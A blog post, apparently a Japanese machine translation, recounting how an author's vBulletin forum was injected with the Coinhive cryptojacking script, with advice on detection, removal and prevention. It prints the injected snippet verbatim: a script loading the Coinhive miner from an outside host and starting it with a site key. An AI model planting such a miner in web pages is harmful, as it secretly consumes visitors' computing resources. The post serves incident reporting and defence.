Web サイトの所有者が Web サイト上でスクリプトを使用し、訪問者が Web サイトにアクセスしたときにそのコンピュータの CPU を使用するという記事を読んだことがあります。その目的は、コンテンツを収益化することです。そのため、広告を使用する代わりに、ブラウザ内で実行されるスクリプトを使用し、ユーザーのコンピュータ リソースを使用して暗号通貨をマイニングします。しかし、私はウェブサイトの所有者だけが意図的にこれを行うと思っていました – ハッカーがそんなことをするなんて想像もしていませんでしたウェブサイトをハッキングするそして、そのスクリプトを他の Web サイトにプッシュし、訪問者の CPU を使用して自分自身がお金を稼ぐのです。しかし、これが今起こっているようです!
Coinhive 暗号マイニング スクリプト
昨日、vBulletin ソフトウェアで動作する TWC フォーラムにアクセスしたとき、セキュリティ ソフトウェアが次の警告を表示しました。
https:// Coinhive dot com /lib/coinhive.js オブジェクト ファイルが検出されました、ダウンロードはブロックされました
私は普段フォーラムに毎日アクセスしていますが、前日は見ていませんでした。ですから、これは私が寝ている夜中に起こったのだと思います。
フォーラムには vBulletin ソフトウェアを使用していますが、最新バージョンに更新されました。さらに、TheWindowsClub.com ドメインが使用しているため、これは私たちにとって非常に驚きでした。Web Juice ウイルス対策とファイアウォールオンライン Web の脅威や攻撃から身を守るため。
PC セキュリティ ソフトウェアは、Windows 10 コンピューター上での悪意のあるスクリプトの実行を正常に停止しました。 ChromeやEdgeなどの他のブラウザでも確認しましたが、結果は同じでした。
フォーラムの Web ページを右クリックしてソース コードを確認したところ、CoinHive の CryptoMiner 悪意のあるスクリプトであることがわかりました。
これは、私のフォーラムのコードに侵入した悪意のある Coinhive Javascript です。
<script src="https:// coinhive dot com /lib/coinhive.min.js"></script><script>var miner =new CoinHive.Anonymous("FG1d35B2h5xqzgJW0bbfyHT22ud9RnEm");miner.start();</script>とにかく、私が最初にしたことは、フォーラムを閉鎖して Sucuri に知らせることでした。
Sucuri の人々は、私のフォーラムに押し込まれた Coinhive スクリプトを数時間でフォーラムから消去し、すべて問題ありませんでした。
コインハイブとは
Coinhive は、Web サイトに埋め込み、Web サイト訪問者のコンピューターの CPU を使用してコインをマイニングできる、Monero 暗号通貨用の JavaScript マイナーを提供します。
これはと呼ばれますクリプトジャッキング。これには、暗号通貨マイニングのためにユーザーのブラウザをハイジャックすることが含まれます。ウェブサイト所有者の中には、それを自分自身で使ってお金を稼ぐ人もいるかもしれませんが、私たちの場合はそれが注入されていました。
ユーザーが感染したサイトにアクセスすると、Coinhive JavaScript が実行され、ユーザーの CPU リソースを利用して Monero がマイニングされます。これにより、CPU スロットリングや被害者のマシンの予期しないシステムクラッシュが発生する可能性があります。
ブラウザが感染している場合、リソース使用率が上昇することがわかります。ブラウザを閉じるとドロップします。ユーザーは、マシンが熱くなったり、ファンが高速で動作したり、バッテリーの消耗が早くなったりすることに気づくかもしれません。
同僚に聞いてみたサウラブ・ムケルカール彼を使って私のフォーラムにアクセスするにはマックそして何が起こったのか見てみましょう。そうですね、Safari でフォーラムを開いたとき、彼の Mac コンピュータも影響を受けました。彼は、Mac にウイルス対策ソフトウェアを使用している賢い Mac OSX ユーザーの 1 人です。彼の Mac 用アバスト アンチウイルスは、悪意のあるスクリプトの実行を正常に阻止しました。
サウラブは言った、
CoinHive マルウェアはブラウザベースの Javascript 感染であるため、Windows PC だけでなく Mac もハイジャックします。 Mac にはウイルス対策ソフトウェアが必要ないという通説を私が信じていないのは良いことです。そうでなければ、私のマシンは感染し、私の Mac は誰かのためにコインを生み出し続けていたでしょう。
CoinHive がウェブサイトに感染するのを防ぎます
- Web サイトやフォーラムでは NULL テンプレートやプラグインを使用しないでください。
- CMS を常に最新バージョンに更新してください。
- ホスティング ソフトウェア (PHP、データベースなど) を定期的に更新してください。
- Web サイトを保護するSucuri、Cloudflare、Wordfence などの Web セキュリティ プロバイダーを使用します。
- 基本を取るブログを保護するための予防策。
CoinHive マイナーを Web サイトから削除
まず第一に、あなたは感染した Web サイトの Web マスターである必要があります。または、Web サイトのすべてのファイルにアクセスできる管理者の資格情報を持っている必要があります。
ウイルス対策ソフトが CoinHive 感染を検出したら、Web ページを右クリックして、ソースコードを表示。次に押すCtrl+F「CoinHive」を検索します。
悪意のあるコードの場所を特定したら、その位置、つまりどこにあるのかを確認する必要があります。次に、手動で削除する必要があります。これを行うには、プラットフォームに関するコーディングの知識が少し必要です。感染したファイルを見つけて、そこから上記のスクリプトを手動で削除する必要があります。よくわからない場合は、専門家に依頼してください。うちはSucuriを使っているのでやらせてもらいました。
それが完了したら、サーバーとブラウザのキャッシュをクリアします。キャッシュ プラグインや MaxCDN などを使用している場合は、それらのキャッシュもクリアします。
暗号通貨マイニング スクリプトから身を守る
暗号通貨とブロックチェーン技術世界を引き継いでいます。それは世界経済に影響を与え、テクノロジーの破壊同じように。誰もがこのような儲かる市場に注目し始めており、これにはウェブサイトハッカーも含まれています。収益が増加するにつれて、そのようなテクノロジーが悪用されることを予期する必要があります。それがあらゆる新興テクノロジーの暗い側面です。
私たちにできることは、常に最善の予防措置を講じることです。良いものを使う以外にも、セキュリティソフト、Chrome または Firefox 拡張機能を使用します。Web サイトが CPU を使用して暗号通貨をマイニングするのをブロックします– さらに良いのは、使用することですアンチWebマイナーそれは止まるだろうクリプトジャッキングマイニング スクリプトを変更して攻撃するホストファイル。すべてのブラウザで動作します。 Mac ユーザーの場合は、コンピュータ用のウイルス対策ソフトウェアも入手してください。
万全の予防策として、感染したサイトにアクセスした可能性があると感じた場合は、ブラウザのキャッシュをクリアし、コンピュータをスキャンすることをお勧めします。ウイルス対策ソフトウェア同様にAdwクリーナー。
安全を確保し、警戒してください!
![マルチプロセッサ構成はサポートされていません ブルー スクリーン [修正]](https://rele.work/tech/hayato/wp-content/uploads/2018/08/MULTIPROCESSOR-CONFIGURATION-NOT-SUPPORTED.jpg)
![ERR_PROXY_CONNECTION_FAILED Chrome エラー [修正]](https://rele.work/tech/hayato/wp-content/uploads/2023/11/ERR_PROXY_CONNECTION_FAILED-Chrome-error-fix.png)
